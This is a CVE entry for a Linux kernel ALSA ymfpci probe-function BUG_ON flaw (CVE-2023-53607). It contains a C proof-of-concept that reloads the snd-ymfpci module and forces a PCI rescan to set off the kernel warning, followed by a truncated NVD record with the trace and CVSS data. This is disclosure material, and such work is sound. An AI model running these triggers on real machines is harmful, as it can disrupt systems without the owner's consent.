CVE-2023-53607

// CVE-2023-53607 PoC - Trigger BUG_ON in snd_ymfpci probe function // This PoC demonstrates how to trigger the vulnerability by loading the snd_ymfpci module // on a system with a Yamaha PCI sound card (YMF724/YMF740/YMF744/YMF754) #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sys/stat.h> #include <string.h> /* * Method 1: Direct module loading * Simply loading the snd_ymfpci module will trigger the probe function * which contains the buggy snd_BUG_ON() assertion. */ int trigger_via_modprobe() { printf("Triggering CVE-2023-53607 via modprobe...\n"); // Load the snd_ymfpci module - this will trigger pci_probe -> snd_card_ymfpci_probe -> snd_ymfpci_create int ret = system("modprobe snd-ymfpci 2>&1"); if (ret != 0) { printf("modprobe failed (module may already be loaded or no compatible hardware)\n"); return -1; } printf("Module loaded - check dmesg for BUG_ON warning\n"); return 0; } /* * Method 2: Trigger via sysfs hotplug (if supported) * Some systems allow triggering PCI rescan which will re-probe the device */ int trigger_via_rescan() { printf("Triggering CVE-2023-53607 via PCI rescan...\n"); // Write to PCI rescan sysfs entry to trigger re-probing int fd = open("/sys/bus/pci/rescan", O_WRONLY); if (fd < 0) { perror("open /sys/bus/pci/rescan"); return -1; } write(fd, "1\n", 2); close(fd); printf("PCI rescan triggered - check dmesg for warnings\n"); return 0; } /* * Method 3: Force module reload * If the module is already loaded, remove and reload it */ int trigger_via_reload() { printf("Attempting module reload...\n"); system("rmmod snd_ymfpci 2>/dev/null"); usleep(100000); int ret = system("modprobe snd-ymfpci 2>&1"); if (ret != 0) { printf("Reload failed\n"); return -1; } printf("Module reloaded - check dmesg for BUG_ON warning\n"); return 0; } int main(int argc, char *argv[]) { printf("=== CVE-2023-53607 PoC ===\n"); printf("Linux Kernel ALSA ymfpci BUG_ON in probe function\n\n"); /* Check if running as root (required for module operations) */ if (getuid() != 0) { printf("Warning: This PoC requires root privileges for module operations\n"); printf("Try: sudo %s\n", argv[0]); } /* Check for compatible hardware */ int hwcheck = system("lspci | grep -i 'Yamaha' 2>/dev/null"); if (hwcheck != 0) { printf("No Yamaha PCI sound card detected.\n"); printf("This vulnerability requires YMF724/YMF740/YMF744/YMF754 hardware.\n"); printf("On systems without this hardware, the module load will fail gracefully.\n\n"); } else { printf("Yamaha PCI sound card detected!\n\n"); } /* Try different trigger methods */ if (argc > 1 && strcmp(argv[1], "rescan") == 0) { trigger_via_rescan(); } else if (argc > 1 && strcmp(argv[1], "reload") == 0) { trigger_via_reload(); } else { trigger_via_modprobe(); } printf("\nCheck kernel logs with: dmesg | grep -i 'snd_ymfpci\|BUG_ON'\n"); return 0; }

{"cve": {"id": "CVE-2023-53607", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:57.410", "lastModified": "2026-03-23T18:26:46.100", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: ymfpci: Fix BUG_ON in probe function\n\nThe snd_dma_buffer.bytes field now contains the aligned size, which this\nsnd_BUG_ON() did not account for, resulting in the following:\n\n[ 9.625915] ------------[ cut here ]------------\n[ 9.633440] WARNING: CPU: 0 PID: 126 at sound/pci/ymfpci/ymfpci_main.c:2168 snd_ymfpci_create+0x681/0x698 [snd_ymfpci]\n[ 9.648926] Modules linked in: snd_ymfpci(+) snd_intel_dspcfg kvm(+) snd_intel_sdw_acpi snd_ac97_codec snd_mpu401_uart snd_opl3_lib irqbypass snd_hda_codec gameport snd_rawmidi crct10dif_pclmul crc32_pclmul cfg80211 snd_hda_core polyval_clmulni polyval_generic gf128mul snd_seq_device ghash_clmulni_intel snd_hwdep ac97_bus sha512_ssse3 rfkill snd_pcm aesni_intel tg3 snd_timer crypto_simd snd mxm_wmi libphy cryptd k10temp fam15h_power pcspkr soundcore sp5100_tco wmi acpi_cpufreq mac_hid dm_multipath sg loop fuse dm_mod bpf_preload ip_tables x_tables ext4 crc32c_generic crc16 mbcache jbd2 sr_mod cdrom ata_generic pata_acpi firewire_ohci crc32c_intel firewire_core xhci_pci crc_itu_t pata_via xhci_pci_renesas floppy\n[ 9.711849] CPU: 0 PID: 126 Comm: kworker/0:2 Not tainted 6.1.21-1-lts #1 08d2e5ece03136efa7c6aeea9a9c40916b1bd8da\n[ 9.722200] Hardware name: To Be Filled By O.E.M. To Be Filled By O.E.M./990FX Extreme4, BIOS P2.70 06/05/2014\n[ 9.732204] Workqueue: events work_for_cpu_fn\n[ 9.736580] RIP: 0010:snd_ymfpci_create+0x681/0x698 [snd_ymfpci]\n[ 9.742594] Code: 8c c0 4c 89 e2 48 89 df 48 c7 c6 92 c6 8c c0 e8 15 d0 e9 ff 48 83 c4 08 44 89 e8 5b 5d 41 5c 41 5d 41 5e 41 5f e9 d3 7a 33 e3 <0f> 0b e9 cb fd ff ff 41 bd fb ff ff ff eb db 41 bd f4 ff ff ff eb\n[ 9.761358] RSP: 0018:ffffab64804e7da0 EFLAGS: 00010287\n[ 9.766594] RAX: ffff8fa2df06c400 RBX: ffff8fa3073a8000 RCX: ffff8fa303fbc4a8\n[ 9.773734] RDX: ffff8fa2df06d000 RSI: 0000000000000010 RDI: 0000000000000020\n[ 9.780876] RBP: ffff8fa300b5d0d0 R08: ffff8fa3073a8e50 R09: 00000000df06bf00\n[ 9.788018] R10: ffff8fa2df06bf00 R11: 00000000df068200 R12: ffff8fa3073a8918\n[ 9.795159] R13: 0000000000000000 R14: 0000000000000080 R15: ffff8fa2df068200\n[ 9.802317] FS: 0000000000000000(0000) GS:ffff8fa9fec00000(0000) knlGS:0000000000000000\n[ 9.810414] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 9.816158] CR2: 000055febaf66500 CR3: 0000000101a2e000 CR4: 00000000000406f0\n[ 9.823301] Call Trace:\n[ 9.825747] <TASK>\n[ 9.827889] snd_card_ymfpci_probe+0x194/0x950 [snd_ymfpci b78a5fe64b5663a6390a909c67808567e3e73615]\n[ 9.837030] ? finish_task_switch.isra.0+0x90/0x2d0\n[ 9.841918] local_pci_probe+0x45/0x80\n[ 9.845680] work_for_cpu_fn+0x1a/0x30\n[ 9.849431] process_one_work+0x1c7/0x380\n[ 9.853464] worker_thread+0x1af/0x390\n[ 9.857225] ? rescuer_thread+0x3b0/0x3b0\n[ 9.861254] kthread+0xde/0x110\n[ 9.864414] ? kthread_complete_and_exit+0x20/0x20\n[ 9.869210] ret_from_fork+0x22/0x30\n[ 9.872792] </TASK>\n[ 9.874985] ---[ end trace 0000000000000000 ]---"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-617"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.9.325", "versionEndExcluding": "4.10", "matchCriteriaId": "5E6014B6-E692-4B06-AA24-90B857F5CBF4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.14.290", "versionEndExcluding": "4.15", "matchCriteriaId": "4CA0864C-E438-4D5B-A88F-0FFF2991C79A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.19.254", "versionEndExcluding": "4.20", "matchCriteriaId": "802ABD1B-E5B4-495A-8800-0A12487EB17A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.4.208", "versionEndExcluding": "5.5", "matchCriteriaId": "E875FE91-C2CB-4A17-BC9F-FA70F0164596"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.10.134", "versionEndExcluding": " ... (truncated)